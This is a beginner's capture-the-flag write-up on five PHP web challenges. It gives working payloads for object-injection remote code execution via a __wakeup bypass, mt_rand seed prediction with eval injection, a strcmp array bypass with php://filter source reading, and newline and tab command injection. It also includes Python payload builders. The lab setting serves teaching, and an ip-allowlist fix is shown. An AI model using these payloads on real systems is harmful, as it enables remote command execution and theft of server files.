A beginner's notes.
nani
Viewing the page source gives the hint user.php.
That points to file inclusion, so read the source through the php://filter wrapper (base64 so the PHP is returned instead of executed):
php://filter/read=convert.base64-encode/resource=user.php
user.php
<?php
class convent{
var $warn = "No hacker.";
function __destruct(){
eval($this->warn);
}
function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
}
}
$cmd = $_POST[cmd];
unserialize($cmd);
?>
Deserialization notes:
1. Bypassing the __wakeup() magic method: when the property count declared in the serialized string is larger than the actual number of properties, unserialize() skips __wakeup() (CVE-2016-7124, fixed in PHP 5.6.25 / 7.0.10). That matters here because __wakeup() would set $warn to null before __destruct() eval()s it.
2. Build the payload and run commands; note the declared count 4 against a single property. Both strings go in the POST parameter cmd:
O:7:"convent":4:{s:4:"warn";s:15:"passthru('ls');";} //list the directory to find the file that holds the flag
O:7:"convent":4:{s:4:"warn";s:39:"passthru('cat dsuhhjfdgjhaskjdkj.txt');";} //read the file
This yields the flag.
random
Visiting it shows the source:
<?php
show_source(__FILE__);
include "flag.php";
$a = @$_REQUEST['hello'];
$seed = @$_REQUEST['seed'];
$key = @$_REQUEST['key'];
mt_srand($seed);
$true_key = mt_rand();
if ($key == $true_key){
echo "Key Confirm";
}
else{
die("Key Error");
}
eval( "var_dump($a);");
?>
PHP pseudo-random number weakness: mt_srand($seed) makes every following mt_rand() call deterministic, so with a chosen seed the first mt_rand() value can be computed offline and submitted as key. The exact value depends on the PHP version (7.1 changed the generator), so compute it on the same major version as the target. Because hello is spliced into eval("var_dump($a);"), it can be any PHP expression; file("./flag.php") dumps the flag file line by line.
Payload:
hello=file("./flag.php")&seed=12345&key=162946439
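To show why a chosen seed fixes the key, here is an added example (not code from the writeup) that reproduces PHP's mt_rand() offline. It is a plain MT19937, which is what PHP 7.1 and later use; mt_rand() with no arguments returns the 32-bit output shifted right by one bit. The function names keys_for_seed and build_query are my own. PHP before 7.1 used a slightly different twist step, so its numbers differ from these.

```python
"""Offline reproduction of PHP >= 7.1 mt_srand()/mt_rand() for a chosen seed.

Added example, not part of the original writeup.  mt_rand() == MT19937 >> 1.
"""
from typing import List
from urllib.parse import urlencode

N, M = 624, 397
MATRIX_A = 0x9908B0DF
UPPER_MASK, LOWER_MASK = 0x80000000, 0x7FFFFFFF
MASK32 = 0xFFFFFFFF


class PhpMtRand:
    def __init__(self, seed: int) -> None:
        # mt_srand(seed): the reference init_genrand() state expansion
        self.mt = [0] * N
        self.mt[0] = seed & MASK32
        for i in range(1, N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & MASK32
        self.index = N  # forces a twist before the first output

    def _twist(self) -> None:
        # In-place generation of the next 624 state words (standard MT19937)
        mt = self.mt
        for i in range(N):
            y = (mt[i] & UPPER_MASK) | (mt[(i + 1) % N] & LOWER_MASK)
            v = mt[(i + M) % N] ^ (y >> 1)
            if y & 1:
                v ^= MATRIX_A
            mt[i] = v
        self.index = 0

    def genrand_int32(self) -> int:
        if self.index >= N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        # tempering
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & MASK32

    def mt_rand(self) -> int:
        # PHP: mt_rand() with no arguments returns php_mt_rand() >> 1
        return self.genrand_int32() >> 1


def keys_for_seed(seed: int, count: int = 1) -> List[int]:
    """First `count` mt_rand() values after mt_srand(seed)."""
    g = PhpMtRand(seed)
    return [g.mt_rand() for _ in range(count)]


def build_query(seed: int, hello: str = 'file("./flag.php")') -> str:
    """Request parameters for the challenge: key is the first mt_rand() after the seed."""
    return urlencode({"hello": hello, "seed": seed, "key": keys_for_seed(seed)[0]})


if __name__ == "__main__":
    print(keys_for_seed(12345))
    print(build_query(12345))
```

Sanity-check the implementation against the MT19937 reference outputs for seed 5489 (3499211612, 581869302, ... and 4123659995 as the 10000th value) before trusting it against a target; if the target runs PHP older than 7.1, the reference values will not match and the seed/key pair has to be generated on that version.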
admin
Visiting it shows the source:
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
?>
Build the payload so that file_get_contents($user) returns exactly "admin" and $file points at class.php (the file named in the comment), which is then included:
class.php
<?php
error_reporting(E_ALL & ~E_NOTICE);
class Read{//fffffflag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "Awwwwwwwwwww man";
}
}
?>
Deserialization: build a serialized Read object whose file property is fffffflag.php (the file named in the comment). When the object is converted to a string, __toString() echoes file_get_contents($this->file), which gives the flag.
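The two serialized payloads on this page (the convent object with the inflated property count in nani, and the Read object here) are easy to get wrong by hand because the s: lengths are byte counts. The following added example (my own code, not from the writeup) builds both from a small serializer; php_object, nani_payload and admin_read_payload are names I chose, and the output is checked against the exact strings used above.

```python
"""Minimal PHP-serialization payload builder for the nani and admin challenges.

Added example, not part of the original writeup.
"""
from typing import Dict, Optional
from urllib.parse import quote


def php_str(value: str) -> str:
    """s:<byte length>:"<bytes>";  The length is in bytes, not characters,
    which is the usual reason a hand-written payload fails to unserialize."""
    raw = value.encode("utf-8")
    return f's:{len(raw)}:"{value}";'


def php_object(class_name: str, props: Dict[str, str],
               declared_count: Optional[int] = None) -> str:
    """O:<len>:"<class>":<n>:{...}.  declared_count lets <n> disagree with the
    real number of properties; on PHP before 5.6.25 / 7.0.10 (CVE-2016-7124)
    unserialize() then skips __wakeup()."""
    count = len(props) if declared_count is None else declared_count
    body = "".join(php_str(k) + php_str(v) for k, v in props.items())
    return f'O:{len(class_name)}:"{class_name}":{count}:{{{body}}}'


def nani_payload(command: str) -> str:
    """convent object: warn is eval()'d in __destruct(); count 4 skips __wakeup()."""
    return php_object("convent", {"warn": f"passthru('{command}');"}, declared_count=4)


def admin_read_payload(path: str = "fffffflag.php") -> str:
    """Read object for class.php: __toString() echoes file_get_contents($file)."""
    return php_object("Read", {"file": path})


def post_body(param: str, payload: str) -> str:
    """URL-encode a payload for a POST body so ';', '"', '{' and '}' arrive intact."""
    return f"{param}={quote(payload, safe='')}"


if __name__ == "__main__":
    print(nani_payload("ls"))
    print(nani_payload("cat dsuhhjfdgjhaskjdkj.txt"))
    print(post_body("cmd", nani_payload("ls")))
    print(admin_read_payload())
```

For the nani challenge the string goes in the POST parameter cmd. For admin, the page's own payload screenshot is missing; the user parameter has to make file_get_contents() return "admin", and the usual way to do that (an assumption here, not something the page shows) is the data:// wrapper, e.g. user=data://text/plain,admin, which requires allow_url_fopen.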
ping
Visiting it shows the source:
<?php
$password="****************";
if(isset($_POST['password'])){
if (strcmp($_POST['password'], $password) == 0) {
echo "Right!!!login success";
include($_REQUEST['path']);
exit();
} else {
echo "Wrong password..";
}
} // closing brace of the isset() check, missing in the copy above
?>
Abuse strcmp(): sending password[]=1 hands it an array, so strcmp() emits a warning and returns NULL, and NULL == 0 is true under loose comparison (PHP 8 throws a TypeError instead, so this only works on older versions). Then read the source of ping.php through the php://filter wrapper via path:
password[]=1&path=php://filter/read=convert.base64-encode/resource=ping.php
ping.php
<?php
if(isset($_REQUEST[ 'ip' ])) {
$target = trim($_REQUEST[ 'ip' ]);
$substitutions = array(
'&' => '',
';' => '',
'|' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
$cmd = shell_exec( 'ping -c 4 ' . $target );
echo $target;
echo "<pre>{$cmd}</pre>";
}
The blacklist never strips a newline, so %0a (URL-encoded \n) terminates the ping command and the shell runs whatever follows as a second command:
127.0.0.1%0als //list the directory
127.0.0.1%0acat ffffff1111aagggg.txt //read the file
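To make the bypass concrete, the following added example (my own code, not from the writeup) re-implements the str_replace() table from ping.php in Python and shows what shell_exec() would receive, next to the allowlist check that should replace it. filter_blacklist, shell_command, validate_ip and safe_argv are names I chose; the inputs are constructed test strings.

```python
"""Why %0a gets past ping.php, and the allowlist that closes the hole.

Added example, not part of the original writeup.
"""
import ipaddress
from typing import List, Optional

# Same table as ping.php.  Note what is absent: newline, tab, space.
SUBSTITUTIONS = {"&": "", ";": "", "|": "", "-": "", "$": "",
                 "(": "", ")": "", "`": "", "||": ""}


def filter_blacklist(target: str) -> str:
    """Mirror of ping.php: trim(), then strip each blacklisted token."""
    target = target.strip()
    for bad, repl in SUBSTITUTIONS.items():
        target = target.replace(bad, repl)
    return target


def shell_command(target: str) -> str:
    """The string shell_exec() would receive after the blacklist."""
    return "ping -c 4 " + filter_blacklist(target)


def validate_ip(target: str) -> Optional[str]:
    """Allowlist: accept only a syntactically valid IPv4/IPv6 address."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def safe_argv(target: str) -> Optional[List[str]]:
    """Argument vector for subprocess.run(argv, shell=False); None if rejected.
    No shell means no separators to worry about, and the IP is validated first."""
    ip = validate_ip(target)
    return None if ip is None else ["ping", "-c", "4", ip]


if __name__ == "__main__":
    for t in ("127.0.0.1;ls", "127.0.0.1|ls", "127.0.0.1\nls", "127.0.0.1\ncat f.txt"):
        print(repr(shell_command(t)), "->", safe_argv(t))
```

With the blacklist, "127.0.0.1;ls" collapses to "127.0.0.1ls" (harmless), but "127.0.0.1\nls" passes through untouched and the shell runs ping and then ls. The stripped "-" only affects the attacker-controlled part; the "-c 4" in the fixed prefix is unaffected. Validating against an IP parser and executing without a shell rejects every one of these inputs except a bare address.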
post1
Source:
POST[a] This time let's play with filtering.
<!--
eval(system($c));//read flag.txt But no cat!!!
-->
Fuzz the command: following a tip from someone in the group, collect the command names under /usr/bin/ and /bin into a wordlist and run it against the parameter.
Any string containing cut gets a different response, so use cut to read the file, with %09 (tab) in place of spaces since the shell treats a tab as argument whitespace:
a=cut%09-b%091-%09flag.txt